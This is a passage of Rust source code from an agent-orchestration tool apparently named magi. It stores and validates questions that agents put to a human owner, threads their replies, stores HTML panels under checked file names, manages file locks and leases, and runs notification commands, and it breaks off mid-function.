1use std::path::{Path, PathBuf};
33use std::time::Duration;
34
35use anyhow::{Context, Result, bail};
36use jiff::Timestamp;
37use serde::{Deserialize, Serialize};
38
39use crate::config;
40use crate::proc::Quiet as _;
41use crate::run::RunStatus;
42
43pub const SCHEMA: u32 = 5;
60
61const POLL: Duration = Duration::from_secs(3);
70
71const REPLY_QUIET_WINDOW: Duration = Duration::from_secs(5 * 60);
82
83const NOTIFY_TIMEOUT: Duration = Duration::from_secs(20);
89
90const WAIT_SLICE: Duration = Duration::from_secs(240);
114
115pub const LEASE_TTL: Duration = Duration::from_secs(90);
125
126const LOCK_STALE: Duration = Duration::from_secs(10);
129
130pub const WEB_URL_ENV: &str = "MAGI_WEB_URL";
141
142pub const PANEL_MAX_BYTES: u64 = 8 * 1024 * 1024;
151
152const PANEL_DIR: &str = ".panel";
158
159const PANEL_HTML: &str = "index.html";
161
162const PANEL_TMP: &str = ".panel.tmp";
164
165pub fn valid_asset_name(name: &str) -> bool {
182 if name.is_empty() || name.len() > 64 || name.contains("..") {
183 return false;
184 }
185 let mut chars = name.chars();
186 chars.next().is_some_and(|c| c.is_ascii_alphanumeric())
187 && chars.all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
188}
189
190#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
192#[serde(rename_all = "lowercase")]
193pub enum QuestionStatus {
194 Open,
196 Answered,
198 Abandoned,
202}
203
204impl QuestionStatus {
205 pub fn open(self) -> bool {
207 matches!(self, Self::Open)
208 }
209
210 pub fn as_str(self) -> &'static str {
212 match self {
213 Self::Open => "open",
214 Self::Answered => "answered",
215 Self::Abandoned => "abandoned",
216 }
217 }
218}
219
220#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
227#[serde(rename_all = "lowercase")]
228pub enum Answer {
229 Choice(String),
231 Text(String),
233}
234
235#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
243#[serde(tag = "do", rename_all = "lowercase")]
244pub enum ChoiceAction {
245 Resume {
247 run: String,
249 },
250 Requeue,
252 Done,
254}
255
256impl ChoiceAction {
257 pub fn parse(spec: &str, default_run: &str) -> Result<(String, Self)> {
262 let Some((label, verb)) = spec.rsplit_once('=') else {
263 bail!("`--action {spec}` must look like `<choice>=<resume[:run]|requeue|done>`");
264 };
265 let label = label.trim();
266 if label.is_empty() {
267 bail!("`--action {spec}` names no choice before `=`");
268 }
269 let verb = verb.trim();
270 let action = match verb.split_once(':') {
271 Some(("resume", run)) if !run.trim().is_empty() => Self::Resume {
272 run: run.trim().to_owned(),
273 },
274 None if verb == "resume" => {
275 if default_run.is_empty() {
276 bail!("`--action {spec}` names no run and MAGI_RUN is not set");
277 }
278 Self::Resume {
279 run: default_run.to_owned(),
280 }
281 }
282 None if verb == "requeue" => Self::Requeue,
283 None if verb == "done" => Self::Done,
284 _ => bail!(
285 "unknown action `{verb}` in `--action {spec}`; \
286 use resume[:<run>], requeue or done"
287 ),
288 };
289 Ok((label.to_owned(), action))
290 }
291
292 pub fn describe(&self) -> String {
294 match self {
295 Self::Resume { run } => format!("resume run {}", short(run)),
296 Self::Requeue => "requeue the task".to_owned(),
297 Self::Done => "mark the task done".to_owned(),
298 }
299 }
300}
301
302pub fn parse_actions(
305 specs: &[String],
306 choices: &[String],
307 default_run: &str,
308) -> Result<std::collections::BTreeMap<String, ChoiceAction>> {
309 let mut out = std::collections::BTreeMap::new();
310 for spec in specs {
311 let (label, action) = ChoiceAction::parse(spec, default_run)?;
312 if !choices.contains(&label) {
313 bail!(
314 "`--action {spec}`: `{label}` is not one of the --choice values ({})",
315 choices.join(", ")
316 );
317 }
318 if out.insert(label.clone(), action).is_some() {
319 bail!("more than one --action for `{label}`");
320 }
321 }
322 Ok(out)
323}
324
325#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
336#[serde(rename_all = "lowercase")]
337pub enum Who {
338 Operator,
340 Agent,
343}
344
345#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
353#[serde(deny_unknown_fields)]
354pub struct Turn {
355 pub who: Who,
357 pub body: String,
359 pub at: Timestamp,
361}
362
363#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
365#[serde(rename_all = "lowercase")]
366pub enum WaiterKind {
367 Asker,
369 Daemon,
372 Deputy,
376}
377
378#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
390pub struct Deputy {
391 pub brief: String,
394 #[serde(default)]
396 pub agent: String,
397 #[serde(default)]
399 pub seat: Option<crate::agent::SeatState>,
400 #[serde(default)]
403 pub starts: u32,
404}
405
406impl Deputy {
407 pub fn new(brief: String) -> Self {
409 Self {
410 brief,
411 agent: String::new(),
412 seat: None,
413 starts: 0,
414 }
415 }
416}
417
418pub fn deputy_seat_key(id: &str) -> String {
420 format!("deputy-{}", short(id))
421}
422
423#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
428pub struct Waiter {
429 pub kind: WaiterKind,
431 pub since: Timestamp,
433}
434
435#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
444pub struct Lease {
445 pub kind: WaiterKind,
447 pub pid: u32,
449 pub beat_at: Timestamp,
451}
452
453impl Lease {
454 pub fn fresh(&self, now: Timestamp) -> bool {
456 now.as_second() - self.beat_at.as_second() <= LEASE_TTL.as_secs() as i64
457 }
458}
459
460#[derive(Debug, Clone, PartialEq, Eq, Serialize, Deserialize)]
462#[serde(deny_unknown_fields)]
463pub struct Question {
464 pub schema: u32,
466 pub id: String,
469 pub run: String,
471 pub node: String,
473 pub seat: String,
476 pub summary: String,
479 pub detail: String,
482 pub choices: Vec<String>,
486 #[serde(default)]
490 pub actions: std::collections::BTreeMap<String, ChoiceAction>,
491 #[serde(default)]
498 pub panel: bool,
499 #[serde(default)]
506 pub assets: Vec<String>,
507 pub status: QuestionStatus,
509 pub asked_at: Timestamp,
511 pub answered_at: Option<Timestamp>,
513 pub answer: Option<Answer>,
515 #[serde(default)]
524 pub thread: Vec<Turn>,
525 #[serde(default)]
540 pub answer_timeout: u64,
541 #[serde(default)]
547 pub cwd: Option<String>,
548 #[serde(default)]
550 pub waiter: Option<Waiter>,
551 #[serde(default)]
555 pub delivered_turns: usize,
556 #[serde(default)]
559 pub answer_delivered: bool,
560 #[serde(default)]
563 pub deputy: Option<Deputy>,
564}
565
566impl Question {
567 pub fn run_names_task(&self) -> bool {
570 matches!(
571 self.node.as_str(),
572 crate::conduct::NODE | crate::triage::NODE | crate::triage::DEPS_NODE
573 )
574 }
575
576 pub fn new(
579 run: String,
580 node: String,
581 seat: String,
582 summary: String,
583 detail: String,
584 choices: Vec<String>,
585 ) -> Self {
586 Self {
587 schema: SCHEMA,
588 id: new_id(),
589 run,
590 node,
591 seat,
592 summary,
593 detail,
594 choices,
595 actions: std::collections::BTreeMap::new(),
596 panel: false,
597 assets: Vec::new(),
598 status: QuestionStatus::Open,
599 asked_at: Timestamp::now(),
600 answered_at: None,
601 answer: None,
602 thread: Vec::new(),
603 answer_timeout: 0,
604 cwd: None,
605 waiter: None,
606 delivered_turns: 0,
607 answer_delivered: false,
608 deputy: None,
609 }
610 }
611
612 pub fn short(&self) -> &str {
614 short(&self.id)
615 }
616
617 pub fn chosen_action(&self) -> Option<&ChoiceAction> {
620 match (&self.status, &self.answer) {
621 (QuestionStatus::Answered, Some(Answer::Choice(c))) => self.actions.get(c),
622 _ => None,
623 }
624 }
625
626 pub fn free_text(&self) -> bool {
628 self.choices.is_empty()
629 }
630
631 pub fn answer(&mut self, answer: Answer) -> Result<()> {
641 match self.status {
642 QuestionStatus::Answered => bail!(
643 "question {} was already answered; the run has moved on and a \
644 second answer would be a decision nobody acted on",
645 self.short()
646 ),
647 QuestionStatus::Abandoned => bail!(
648 "question {} was abandoned and the run behind it is gone",
649 self.short()
650 ),
651 QuestionStatus::Open => {}
652 }
653 let body = match &answer {
654 Answer::Choice(c) | Answer::Text(c) => c.as_str(),
655 };
656 if body.trim().is_empty() {
657 bail!(
658 "question {} needs an answer; an empty one tells the agent \
659 nothing and it would guess anyway",
660 self.short()
661 );
662 }
663 match &answer {
664 Answer::Choice(c) if self.free_text() => bail!(
665 "question {} asks for free text, so `{c}` cannot be a choice \
666 it offered",
667 self.short()
668 ),
669 Answer::Choice(c) if !self.choices.iter().any(|o| o == c) => bail!(
670 "`{c}` is not one of the choices question {} offers: {}",
671 self.short(),
672 self.choices.join(", ")
673 ),
674 Answer::Text(_) if !self.free_text() => bail!(
675 "question {} is multiple choice; answer with one of: {}",
676 self.short(),
677 self.choices.join(", ")
678 ),
679 _ => {}
680 }
681 self.answered_at = Some(Timestamp::now());
682 self.answer = Some(answer);
683 self.status = QuestionStatus::Answered;
684 Ok(())
685 }
686
687 pub fn abandon(&mut self, why: impl Into<String>) {
699 if !self.status.open() {
700 return;
701 }
702 self.status = QuestionStatus::Abandoned;
703 let why = why.into();
704 let why = why.trim();
705 if why.is_empty() {
706 return;
707 }
708 if !self.detail.is_empty() {
709 self.detail.push('\n');
710 }
711 self.detail.push_str("\n_Abandoned: ");
712 self.detail.push_str(why);
713 self.detail.push_str("._\n");
714 }
715
716 pub fn resolution(&self) -> Option<String> {
723 match (self.status, &self.answer) {
724 (QuestionStatus::Answered, Some(Answer::Choice(a) | Answer::Text(a))) => {
725 Some(a.clone())
726 }
727 _ => None,
728 }
729 }
730
731 pub fn settle_by_deputy(&mut self, seat: &str, label: &str, quote: &str) -> Result<()> {
742 let Some(deputy) = &self.deputy else {
743 bail!("question {} has no deputy", self.short());
744 };
745 let own = deputy.seat.as_ref().map(|s| s.key.as_str());
746 if own != Some(seat) {
747 bail!("only the deputy of question {} may settle it", self.short());
748 }
749 if !self.choices.iter().any(|c| c == label) {
750 bail!(
751 "`{label}` is not one of the choices offered on question {}",
752 self.short()
753 );
754 }
755 let quote = quote.trim();
756 if quote.is_empty()
757 || !self
758 .thread
759 .iter()
760 .any(|t| t.who == Who::Operator && t.body.contains(quote))
761 {
762 bail!(
763 "the quote is not something the owner said on question {}",
764 self.short()
765 );
766 }
767 if self.node == crate::land::APPROVAL_NODE {
768 let latest = self
775 .thread
776 .iter()
777 .rev()
778 .find(|t| t.who == Who::Operator)
779 .map(|t| t.body.trim());
780 let ok = if label == crate::land::APPROVE {
781 latest.is_some_and(|m| crate::land::merge_intent(m, quote))
782 } else if label == crate::land::HOLD {
783 latest.is_some_and(|m| {
784 quote.eq_ignore_ascii_case(label) && m.eq_ignore_ascii_case(label)
785 })
786 } else {
787 false
788 };
789 if !ok {
790 bail!(
791 "on a merge approval `{label}` settles it only when the owner's latest \
792 message clearly says so, unhedged and quoted verbatim ({}); ask what \
793 they mean with `--thread` instead",
794 if label == crate::land::HOLD {
795 "for `hold`, the whole message"
796 } else {
797 "no maybe / if / not / question"
798 }
799 );
800 }
801 }
802 self.thread.push(Turn {
803 who: Who::Agent,
804 body: format!("Settled as `{label}` on the owner's words: \"{quote}\""),
805 at: Timestamp::now(),
806 });
807 self.delivered_turns = self.thread.len();
808 self.answer(Answer::Choice(label.to_owned()))
809 }
810
811 pub fn say(&mut self, body: impl Into<String>) -> Result<()> {
822 match self.status {
823 QuestionStatus::Answered => bail!(
824 "question {} was already answered; there is nothing left to \
825 discuss",
826 self.short()
827 ),
828 QuestionStatus::Abandoned => bail!(
829 "question {} was abandoned and the run behind it is gone",
830 self.short()
831 ),
832 QuestionStatus::Open => {}
833 }
834 let body = body.into();
835 if body.trim().is_empty() {
836 bail!("a message to question {} cannot be empty", self.short());
837 }
838 self.thread.push(Turn {
839 who: Who::Operator,
840 body,
841 at: Timestamp::now(),
842 });
843 Ok(())
844 }
845
846 pub fn reply(&mut self, body: impl Into<String>, choices: Vec<String>) -> Result<()> {
856 match self.status {
857 QuestionStatus::Answered => bail!(
858 "question {} was already answered; replying now would not \
859 reach anyone",
860 self.short()
861 ),
862 QuestionStatus::Abandoned => bail!(
863 "question {} was abandoned and the run behind it is gone",
864 self.short()
865 ),
866 QuestionStatus::Open => {}
867 }
868 let body = body.into();
869 if body.trim().is_empty() {
870 bail!("a reply to question {} cannot be empty", self.short());
871 }
872 self.actions.retain(|label, _| choices.contains(label));
874 self.choices = choices;
875 let unread = self.unread_from_owner().is_some();
876 self.thread.push(Turn {
877 who: Who::Agent,
878 body,
879 at: Timestamp::now(),
880 });
881 if !unread {
885 self.delivered_turns = self.thread.len();
886 }
887 Ok(())
888 }
889
890 pub fn unread_from_owner(&self) -> Option<String> {
897 if !self.status.open() {
898 return None;
899 }
900 let said = self.undelivered_owner_turns();
901 (!said.is_empty()).then(|| said.join("\n\n"))
902 }
903
904 pub fn undelivered_owner_turns(&self) -> Vec<&str> {
910 let from = self.delivered_turns.min(self.thread.len());
911 self.thread[from..]
912 .iter()
913 .filter(|t| t.who == Who::Operator)
914 .map(|t| t.body.as_str())
915 .collect()
916 }
917
918 pub fn last_activity(&self) -> i64 {
922 self.thread
923 .iter()
924 .map(|t| t.at.as_second())
925 .max()
926 .unwrap_or(0)
927 .max(self.asked_at.as_second())
928 }
929
930 pub fn waiting_on_agent(&self) -> bool {
939 self.status.open() && matches!(self.thread.last(), Some(t) if t.who == Who::Operator)
940 }
941
942 fn should_notify(&self, now: Timestamp) -> bool {
950 let Some(last) = self
951 .thread
952 .iter()
953 .rev()
954 .find(|t| t.who == Who::Operator)
955 .map(|t| t.at)
956 else {
957 return true;
958 };
959 now.as_second() - last.as_second() > REPLY_QUIET_WINDOW.as_secs() as i64
960 }
961}
962
963#[derive(Debug, Clone)]
965pub struct Questions {
966 root: PathBuf,
967}
968
969impl Questions {
970 pub fn open() -> Self {
972 Self::at(crate::run::home().join("questions"))
973 }
974
975 pub fn at(root: PathBuf) -> Self {
978 Self { root }
979 }
980
981 pub fn root(&self) -> &Path {
983 &self.root
984 }
985
986 pub fn path_of(&self, id: &str) -> PathBuf {
988 self.root.join(format!("{id}.json"))
989 }
990
991 pub fn panel_dir(&self, id: &str) -> PathBuf {
993 self.root.join(format!("{id}{PANEL_DIR}"))
994 }
995
996 pub fn put_panel(&self, q: &mut Question, html: &str, assets: &[PathBuf]) -> Result<()> {
1020 if !valid_asset_name(&q.id) {
1021 bail!(
1022 "question id `{}` is not a name magi will build a panel path from",
1023 q.id
1024 );
1025 }
1026 if html.trim().is_empty() {
1027 bail!(
1028 "question {} was handed an empty panel; an empty frame reads to \
1029 the owner as \"the agent had nothing to say\", which is a lie",
1030 q.short()
1031 );
1032 }
1033
1034 let mut named: Vec<(String, &Path)> = Vec::with_capacity(assets.len());
1037 for src in assets {
1038 let name = src.file_name().and_then(|n| n.to_str()).unwrap_or_default();
1039 if !valid_asset_name(name) {
1040 bail!(
1041 "panel asset `{}` cannot be stored: a panel file name must \
1042 match ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`",
1043 src.display()
1044 );
1045 }
1046 if let Some((_, first)) = named.iter().find(|(n, _)| n == name) {
1047 bail!(
1048 "two panel assets are both named `{name}` - {} and {} - and \
1049 the panel can only show one of them; rename one at the source",
1050 first.display(),
1051 src.display()
1052 );
1053 }
1054 named.push((name.to_owned(), src.as_path()));
1055 }
1056
1057 let mut total = html.len() as u64;
1058 for (_, src) in &named {
1059 let meta = std::fs::metadata(src)
1060 .with_context(|| format!("stat panel asset {}", src.display()))?;
1061 if !meta.is_file() {
1062 bail!(
1063 "panel asset `{}` is not a file; a panel is html plus files \
1064 copied beside it",
1065 src.display()
1066 );
1067 }
1068 total = total.saturating_add(meta.len());
1069 }
1070 if total > PANEL_MAX_BYTES {
1071 bail!(
1072 "panel for question {} is {total} bytes, over magi's cap of \
1073 {PANEL_MAX_BYTES} bytes; nothing was written",
1074 q.short()
1075 );
1076 }
1077
1078 let tmp = self.root.join(format!("{}{PANEL_TMP}", q.id));
1079 let dir = self.panel_dir(&q.id);
1080 std::fs::create_dir_all(&self.root)
1081 .with_context(|| format!("create {}", self.root.display()))?;
1082 clear_dir(&tmp)?;
1083 std::fs::create_dir(&tmp).with_context(|| format!("create {}", tmp.display()))?;
1084 if let Err(e) = fill_panel(&tmp, html, &named) {
1085 let _ = std::fs::remove_dir_all(&tmp);
1088 return Err(e);
1089 }
1090 clear_dir(&dir)?;
1091 std::fs::rename(&tmp, &dir)
1092 .with_context(|| format!("move panel into {}", dir.display()))?;
1093
1094 q.panel = true;
1095 q.assets = named.into_iter().map(|(n, _)| n).collect();
1096 q.assets.sort_unstable();
1097 Ok(())
1098 }
1099
1100 pub fn panel_html(&self, id: &str) -> Option<String> {
1106 if !valid_asset_name(id) {
1107 return None;
1108 }
1109 std::fs::read_to_string(self.panel_dir(id).join(PANEL_HTML)).ok()
1110 }
1111
1112 pub fn panel_asset(&self, id: &str, name: &str) -> Result<Option<Vec<u8>>> {
1123 if !valid_asset_name(name) {
1124 bail!(
1125 "`{name}` is not a panel file name; it must match \
1126 ^[A-Za-z0-9][A-Za-z0-9._-]{{0,63}}$ and contain no `..`"
1127 );
1128 }
1129 if !valid_asset_name(id) {
1130 return Ok(None);
1131 }
1132 let dir = self.panel_dir(id);
1133 if !dir.is_dir() {
1134 return Ok(None);
1135 }
1136 let path = dir.join(name);
1137 match std::fs::read(&path) {
1138 Ok(bytes) => Ok(Some(bytes)),
1139 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(None),
1140 Err(e) => Err(e).with_context(|| format!("read {}", path.display())),
1141 }
1142 }
1143
1144 pub fn drop_panel(&self, id: &str) -> Result<()> {
1153 if !valid_asset_name(id) {
1154 bail!("question id `{id}` is not a name magi will build a panel path from");
1155 }
1156 clear_dir(&self.panel_dir(id))?;
1157 clear_dir(&self.root.join(format!("{id}{PANEL_TMP}")))
1158 }
1159
1160 pub fn lease_path(&self, id: &str) -> PathBuf {
1162 self.root.join(format!("{id}.lease"))
1163 }
1164
1165 pub fn read_lease(&self, id: &str) -> Option<Lease> {
1167 let body = std::fs::read_to_string(self.lease_path(id)).ok()?;
1168 serde_json::from_str(&body).ok()
1169 }
1170
1171 pub fn beat(&self, id: &str, kind: WaiterKind) {
1178 let lease = Lease {
1179 kind,
1180 pid: std::process::id(),
1181 beat_at: Timestamp::now(),
1182 };
1183 let path = self.lease_path(id);
1184 let tmp = path.with_extension("lease.tmp");
1185 let written = std::fs::create_dir_all(&self.root)
1186 .and_then(|()| std::fs::write(&tmp, serde_json::to_string(&lease).unwrap_or_default()))
1187 .and_then(|()| std::fs::rename(&tmp, &path));
1188 if let Err(e) = written {
1189 tracing::debug!("could not beat the lease on question {id}: {e}");
1190 }
1191 }
1192
1193 pub fn drop_lease(&self, id: &str) {
1195 let _ = std::fs::remove_file(self.lease_path(id));
1196 }
1197
1198 pub fn update<T>(
1209 &self,
1210 id: &str,
1211 f: impl FnOnce(&mut Question) -> Result<T>,
1212 ) -> Result<(Question, T)> {
1213 std::fs::create_dir_all(&self.root)
1214 .with_context(|| format!("create {}", self.root.display()))?;
1215 let lock = self.root.join(format!("{id}.lock"));
1216 let started = std::time::Instant::now();
1217 loop {
1218 match std::fs::OpenOptions::new()
1219 .write(true)
1220 .create_new(true)
1221 .open(&lock)
1222 {
1223 Ok(_) => break,
1224 Err(e) if e.kind() == std::io::ErrorKind::AlreadyExists => {
1225 let stale = std::fs::metadata(&lock)
1226 .and_then(|m| m.modified())
1227 .ok()
1228 .and_then(|t| t.elapsed().ok())
1229 .is_some_and(|age| age > LOCK_STALE);
1230 if stale {
1231 let _ = std::fs::remove_file(&lock);
1232 } else if started.elapsed() > LOCK_STALE {
1233 bail!("could not lock question {id}");
1234 } else {
1235 std::thread::sleep(Duration::from_millis(15));
1236 }
1237 }
1238 Err(e) => return Err(e).with_context(|| format!("lock {}", lock.display())),
1239 }
1240 }
1241 struct Unlock(PathBuf);
1242 impl Drop for Unlock {
1243 fn drop(&mut self) {
1244 let _ = std::fs::remove_file(&self.0);
1245 }
1246 }
1247 let _guard = Unlock(lock);
1248 let mut q = read_path(&self.path_of(id))?;
1249 let out = f(&mut q)?;
1250 self.put(&mut q)?;
1251 Ok((q, out))
1252 }
1253
1254 pub fn put(&self, q: &mut Question) -> Result<()> {
1258 std::fs::create_dir_all(&self.root)
1259 .with_context(|| format!("create {}", self.root.display()))?;
1260 let body = serde_json::to_string_pretty(q).context("serialize question")?;
1261 let path = self.path_of(&q.id);
1262 let tmp = path.with_extension("json.tmp");
1263 let is_new = !path.exists();
1264 std::fs::write(&tmp, &body).with_context(|| format!("write {}", tmp.display()))?;
1265 std::fs::rename(&tmp, &path).with_context(|| format!("replace {}", path.display()))?;
1266 if is_new
1269 && q.status.open()
1270 && q.node != crate::bump::NOTICE_NODE
1271 && let Some(home) = self.root.parent().filter(|p| !p.as_os_str().is_empty())
1272 {
1273 crate::notices::quiet_for(home, q);
1274 }
1275 Ok(())
1276 }
1277
1278 pub fn get(&self, id: &str) -> Result<Question> {
1280 let resolved = self.resolve_id(id)?;
1281 read_path(&self.path_of(&resolved))
1282 }
1283
1284 pub fn list(&self) -> Vec<Question> {
1292 let mut all: Vec<Question> = std::fs::read_dir(&self.root)
1293 .into_iter()
1294 .flatten()
1295 .flatten()
1296 .map(|e| e.path())
1297 .filter(|p| p.extension().is_some_and(|x| x == "json"))
1298 .filter_map(|p| read_path(&p).ok())
1299 .collect();
1300 all.sort_unstable_by(|a, b| {
1301 let rank = |q: &Question| u8::from(!q.status.open());
1302 rank(a).cmp(&rank(b)).then_with(|| b.id.cmp(&a.id))
1303 });
1304 all
1305 }
1306
1307 pub fn open_for(&self, run: &str) -> Vec<Question> {
1313 self.list()
1314 .into_iter()
1315 .filter(|q| q.status.open() && q.run == run)
1316 .collect()
1317 }
1318
1319 pub fn abandon_for_run(&self, run: &str, why: &str) -> Result<usize> {
1332 let mut abandoned = 0;
1333 for mut q in self.open_for(run) {
1334 q.abandon(why);
1335 self.put(&mut q)?;
1336 abandoned += 1;
1337 }
1338 Ok(abandoned)
1339 }
1340
1341 pub fn settle_run(&self, run: &str, status: RunStatus) -> Result<usize> {
1365 if status.resumable() {
1366 return Ok(0);
1367 }
1368 let why = format!(
1369 "run {run} {}, so nothing is waiting for this answer",
1370 status.as_str()
1371 );
1372 let mut abandoned = 0;
1377 for mut q in self.open_for(run) {
1378 if q.node == crate::bump::NOTICE_NODE {
1379 continue;
1380 }
1381 q.abandon(&why);
1382 self.put(&mut q)?;
1383 abandoned += 1;
1384 }
1385 Ok(abandoned)
1386 }
1387
1388 pub fn resolve_id(&self, prefix: &str) -> Result<String> {
1391 if self.path_of(prefix).is_file() {
1392 return Ok(prefix.to_owned());
1393 }
1394 let hits: Vec<String> = self
1395 .list()
1396 .into_iter()
1397 .map(|q| q.id)
1398 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix))
1399 .collect();
1400 match hits.len() {
1401 1 => Ok(hits.into_iter().next().expect("exactly one hit")),
1402 0 => bail!("no question matches `{prefix}`"),
1403 _ => bail!(
1404 "`{prefix}` matches {} questions: {}",
1405 hits.len(),
1406 hits.join(", ")
1407 ),
1408 }
1409 }
1410
1411 pub fn revision(&self) -> u64 {
1415 std::fs::read_dir(&self.root)
1416 .into_iter()
1417 .flatten()
1418 .flatten()
1419 .filter_map(|e| e.metadata().ok())
1420 .filter_map(|m| m.modified().ok())
1421 .filter_map(|t| t.duration_since(std::time::UNIX_EPOCH).ok())
1422 .map(|d| d.as_millis() as u64)
1423 .max()
1424 .unwrap_or(0)
1425 }
1426
1427 pub fn count_open(&self) -> usize {
1433 self.list().iter().filter(|q| q.status.open()).count()
1434 }
1435
1436 pub fn count_needs_owner(&self) -> usize {
1445 self.list()
1446 .iter()
1447 .filter(|q| q.status.open() && !q.waiting_on_agent())
1448 .count()
1449 }
1450}
1451
1452#[derive(Debug, Clone, PartialEq, Eq)]
1454pub enum Wait {
1455 Answered(String),
1457 Replied(String),
1462 Pending,
1469 Abandoned,
1474}
1475
1476pub async fn ask_and_wait(
1483 q: &mut Question,
1484 store: &Questions,
1485 notify: &config::Notify,
1486 timeout: Duration,
1487) -> Result<Wait> {
1488 wait_for_owner(q, store, notify, timeout, POLL).await
1489}
1490
1491pub async fn resume_wait(q: &mut Question, store: &Questions, timeout: Duration) -> Result<Wait> {
1506 wait_loop(q, store, timeout, WAIT_SLICE, POLL).await
1507}
1508
1509async fn wait_for_owner(
1515 q: &mut Question,
1516 store: &Questions,
1517 cfg: &config::Notify,
1518 timeout: Duration,
1519 poll: Duration,
1520) -> Result<Wait> {
1521 if !store.path_of(&q.id).is_file() {
1525 store.put(q).context("file the question")?;
1526 }
1527 if q.should_notify(Timestamp::now()) {
1528 if let Err(e) = notify(cfg, q).await {
1529 tracing::warn!(
1534 "could not notify about question {}: {e:#} - the web UI is the \
1535 only surface for it now",
1536 q.short()
1537 );
1538 }
1539 }
1540 tracing::info!(
1541 "question {} from {} is waiting for you: {}",
1542 q.short(),
1543 q.seat,
1544 q.summary
1545 );
1546 wait_loop(q, store, timeout, WAIT_SLICE, poll).await
1547}
1548
1549fn hold(store: &Questions, id: &str) {
1551 store.beat(id, WaiterKind::Asker);
1552 let took = store.update(id, |q| {
1553 if q.status.open() {
1554 q.waiter = Some(Waiter {
1555 kind: WaiterKind::Asker,
1556 since: Timestamp::now(),
1557 });
1558 }
1559 Ok(())
1560 });
1561 if let Err(e) = took {
1562 tracing::debug!("could not note the wait on question {id}: {e:#}");
1563 }
1564}
1565
1566pub fn hand_over(store: &Questions, q: &mut Question) {
1574 let done = store.update(&q.id, |r| {
1575 r.delivered_turns = r.delivered_turns.max(q.thread.len());
1576 if r.status == QuestionStatus::Answered {
1577 r.answer_delivered = true;
1578 }
1579 r.waiter = None;
1580 Ok(())
1581 });
1582 match done {
1583 Ok((fresh, ())) => *q = fresh,
1584 Err(e) => tracing::debug!("could not record the hand-over of {}: {e:#}", q.short()),
1585 }
1586}
1587
1588pub fn answer_for_agent(q: &Question, answer: &str) -> String {
1592 let says = q.undelivered_owner_turns();
1593 if says.is_empty() {
1594 return answer.to_owned();
1595 }
1596 format!(
1597 "the owner also said, before answering:\n\n{}\n\nthe owner answered:\n\n{answer}",
1598 says.join("\n\n")
1599 )
1600}
1601
1602pub fn deliver_answer(
1605 store: &Questions,
1606 q: &mut Question,
1607 answer: &str,
1608 out: &mut impl std::io::Write,
1609) -> std::io::Result<()> {
1610 writeln!(out, "{}", answer_for_agent(q, answer))?;
1611 out.flush()?;
1612 hand_over(store, q);
1613 Ok(())
1614}
1615
1616async fn wait_loop(
1626 q: &mut Question,
1627 store: &Questions,
1628 timeout: Duration,
1629 slice: Duration,
1630 poll: Duration,
1631) -> Result<Wait> {
1632 if let Some(said) = q.unread_from_owner() {
1642 return Ok(Wait::Replied(said));
1643 }
1644 hold(store, &q.id);
1645
1646 let bounded = timeout.min(slice);
1647 let is_the_real_deadline = bounded >= timeout;
1648 let deadline = tokio::time::Instant::now() + bounded;
1649 loop {
1650 let now = tokio::time::Instant::now();
1651 if now >= deadline {
1652 if !is_the_real_deadline {
1653 return Ok(Wait::Pending);
1657 }
1658 let why = format!("no answer within {}s of asking", timeout.as_secs().max(1));
1659 let (fresh, unread) = store
1663 .update(&q.id, |r| {
1664 let unread = r.unread_from_owner();
1665 if unread.is_none() {
1666 r.abandon(&why);
1667 r.waiter = None;
1668 }
1669 Ok(unread)
1670 })
1671 .context("record the abandoned question")?;
1672 *q = fresh;
1673 if let Some(said) = unread {
1674 return Ok(Wait::Replied(said));
1675 }
1676 tracing::warn!(
1677 "question {} went unanswered for {}s; the run parks and the \
1678 question stays as the record of it",
1679 q.short(),
1680 timeout.as_secs()
1681 );
1682 return Ok(Wait::Abandoned);
1683 }
1684 tokio::time::sleep(poll.min(deadline - now)).await;
1685 store.beat(&q.id, WaiterKind::Asker);
1686 match store.get(&q.id) {
1687 Ok(fresh) if !fresh.status.open() => {
1688 *q = fresh;
1692 return Ok(match q.resolution() {
1693 Some(a) => Wait::Answered(a),
1694 None => Wait::Abandoned,
1697 });
1698 }
1699 Ok(fresh) => {
1700 if let Some(said) = fresh.unread_from_owner() {
1701 *q = fresh;
1702 return Ok(Wait::Replied(said));
1703 }
1704 }
1707 Err(e) => {
1708 tracing::debug!("could not re-read question {}: {e:#}", q.short());
1712 }
1713 }
1714 }
1715}
1716
1717pub async fn notify(cmd: &config::Notify, q: &Question) -> Result<()> {
1728 notify_text(cmd, &q.run, &q.summary).await
1729}
1730
1731pub async fn notify_text(cmd: &config::Notify, run: &str, summary: &str) -> Result<()> {
1734 let Some((program, args)) = cmd.command.split_first() else {
1735 return Ok(());
1737 };
1738 let url = web_url();
1739 if url.is_empty() && cmd.command.iter().any(|a| a.contains("{url}")) {
1740 tracing::warn!(
1741 "the notification command uses {{url}} but {WEB_URL_ENV} is unset, \
1742 so the link will be empty - export it next to `magi serve` with \
1743 the address `magi web --open` printed"
1744 );
1745 }
1746 let argv: Vec<String> = args.iter().map(|a| expand(a, run, summary, &url)).collect();
1747 tracing::debug!(program = %program, args = ?argv, "notifying");
1748
1749 let mut child = tokio::process::Command::new(program);
1750 child.quiet();
1751 child
1752 .args(&argv)
1753 .stdin(std::process::Stdio::null())
1754 .kill_on_drop(true);
1757 let out = match tokio::time::timeout(NOTIFY_TIMEOUT, child.output()).await {
1758 Ok(r) => r.with_context(|| format!("run notification command `{program}`"))?,
1759 Err(_) => bail!(
1760 "notification command `{program}` did not finish within {}s",
1761 NOTIFY_TIMEOUT.as_secs()
1762 ),
1763 };
1764 if !out.status.success() {
1765 let stderr = String::from_utf8_lossy(&out.stderr);
1766 let why = stderr
1767 .lines()
1768 .rev()
1769 .find(|l| !l.trim().is_empty())
1770 .unwrap_or("no output on stderr")
1771 .trim();
1772 bail!(
